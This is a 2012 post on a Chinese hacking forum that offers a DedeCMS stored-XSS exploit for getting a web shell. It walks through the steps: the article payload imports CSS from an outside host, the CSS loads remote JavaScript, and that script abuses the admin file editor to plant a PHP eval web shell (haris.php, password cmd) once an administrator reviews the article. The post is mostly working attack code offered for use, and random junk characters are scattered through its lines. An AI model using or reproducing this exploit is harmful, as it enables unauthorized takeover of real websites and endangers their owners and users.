找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1846|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell1 X6 u6 P8 ?6 `' a) o! l0 u: U$ g
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)2 V, l4 ?  Z! i' b. x& ?
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
; L+ s8 W- L$ X* F9 B# X9 N下面说说利用方法。
' y4 }  J. B5 O/ R8 F. N; `" t. S7 @条件有2个:# {1 D$ p' y/ V# L+ R4 P9 x
1.开启注册0 q6 J/ k1 q8 e. N9 J, H
2.开启投稿. `5 K7 f1 P" W$ k
注册会员----发表文章
  A2 v) z! [3 D( ?8 L内容填写:4 h  u* D0 R. }4 {9 U
复制代码5 o7 Q1 @4 O/ p% K+ |, M
<style>@im\port'\http://xxx.com/xss.css';</style>
. f# u) L, a% f3 R( D8 P+ h2 j新建XSS.Css3 R/ v; i0 T3 m; G
复制代码
* ]: m) G! T+ j+ _! o9 M.body{
& n: g8 p9 e3 \9 Q2 Y6 Ibackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
# M; D% E. G9 g  Z, K新建xss.js 内容为1 G- F( N& b9 ?  {# L; J+ `
复制代码  S3 r6 B9 X6 U: _
1.var request = false;
% Q; H7 w- K; f: _9 G( i# K2.if(window.XMLHttpRequest) {
9 b9 i& Q0 c2 I! p. s: q3.request = new XMLHttpRequest();9 M$ F) K4 A: p! T9 M! o
4.if(request.overrideMimeType) {( [/ @: A! [2 v, A0 s+ s5 b- U
5.request.overrideMimeType('text/xml');  x; n9 P$ \( h# s. H
6.}
# S# x1 |. v4 H1 t+ k1 H+ F8 C7 X5 H7.} else if(window.ActiveXObject) {
, ?( Q5 g0 o& E' ]/ r" D! h8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];- o( D  x8 R: m# B$ F
9.for(var i=0; i<versions.length; i++) {
# o8 \, {- Z  h10.try {
2 J# M* `4 O( ^' ?1 S* W11.request = new ActiveXObject(versions);
( C( m0 Z1 h% z8 |; {) W/ B12.} catch(e) {}9 V  p0 E& v3 t
13.}
4 F8 X, _, b0 X( g2 k( W2 l14.}
, s  R/ H( H( }, z: z9 v15.xmlhttp=request;' P6 |6 V, X! J3 g* g! C& t1 k$ ^
16.function getFolder( url ){' X9 Q( G: O4 R  k( c
17. obj = url.split('/')
8 [1 Y. F: Z0 V: k/ l( X7 s18. return obj[obj.length-2]; A# Q! m# V+ O: w: Y5 k3 j
19.}1 c5 i2 z. b2 Z/ D; A
20.oUrl = top.location.href;
  V/ \0 T$ i3 ]8 L. c( x3 f  O+ l21.u = getFolder(oUrl);$ a% n# A6 m; B: ?( q
22.add_admin();
% t% V6 Z" Q) B$ H" [7 ?23.function add_admin(){1 p+ C. P- z9 ^" @
24.var url= "/"+u+"/sys_sql_query.php";4 `9 n/ }! N: L" t6 N
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
* Q# P  [* g2 k( q5 A; d5 G26.xmlhttp.open("POST", url, true);6 `5 Y# u* E& D8 c1 B
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");/ v7 p2 t% n- B5 ]5 e
28.xmlhttp.setRequestHeader("Content-length", params.length);* Y; [' C  a# Q, }" X7 X# |& n" W
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
8 n; G4 F" a4 x30.xmlhttp.send(params);
" G* `3 K9 |1 e) ]% J' f% x31.}7 `$ `) \6 D/ M+ x
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表